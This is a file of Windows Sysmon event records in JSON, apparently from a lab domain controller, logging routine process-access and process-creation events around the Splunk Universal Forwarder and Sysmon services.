{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6538,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-001061620C00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-001061620C00}","TargetProcessId":"4812","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6539,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.198\r\nSourceProcessGUID: {A837DB8D-0461-5F25-0000-001061620C00}\r\nSourceProcessId: 4812\r\nSourceThreadId: 2984\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.198","SourceProcessGUID":"{A837DB8D-0461-5F25-0000-001061620C00}","SourceProcessId":"4812","SourceThreadId":"2984","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6540,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.933\r\nProcessGuid: {A837DB8D-0461-5F25-0000-00102C640C00}\r\nProcessId: 5080\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.933","ProcessGuid":"{A837DB8D-0461-5F25-0000-00102C640C00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6541,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-00102C640C00}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-00102C640C00}","TargetProcessId":"5080","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6542,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-00102C640C00}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-00102C640C00}","TargetProcessId":"5080","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6543,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6544,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6545,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6546,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
